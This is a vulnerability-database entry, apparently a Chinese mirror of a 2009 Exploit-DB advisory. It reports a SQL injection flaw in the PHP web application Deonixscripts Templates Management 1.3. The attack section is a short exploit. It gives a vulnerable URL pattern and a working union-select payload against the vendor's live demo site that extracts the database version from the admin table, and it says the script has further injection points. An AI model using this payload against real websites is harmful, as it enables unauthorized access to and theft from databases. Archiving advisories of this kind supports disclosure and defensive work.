Deonixscripts Templates Management 1.3 - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058044 漏洞类型
发布时间 2009-07-24 更新时间 2009-07-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9251
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
--------------------------------------------------------------------------
Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability

--------------------------------------------------------------------------
 ###################################################
 [+] Author        :  d3b4g
 [+] Email         :  bl4ckend[at]gmail.com
 [+] Twitter       :  twitter.com/schaba
 [+] Vulnerability :  SQL injection
 ###################################################

 () about script:- Web Templates management System allows you to start your own
    Web design business in no time by providing you with an impressive list of 
    features. You can sell individual templates (exclusive or recurring sale) or 
    offer free download to registered members by offering them with free or paid 
    membership. 
 

----------------------------------------------------------------------------------
 () Vulnerability demo :- http://www.site.com/path/index.php?action=readmore&id=(SQL c0de)

 () Live demo :- http://www.deonixscripts.com/demo/tplmgt13/index.php?action=readmore&id=-1+union+select+1,version(),3,4+from+admin--



  # note :- This script is pr0n to multiple sql injection vuln.


 #####################################################
 From Tiny little island of Maldivies

# milw0rm.com [2009-07-24]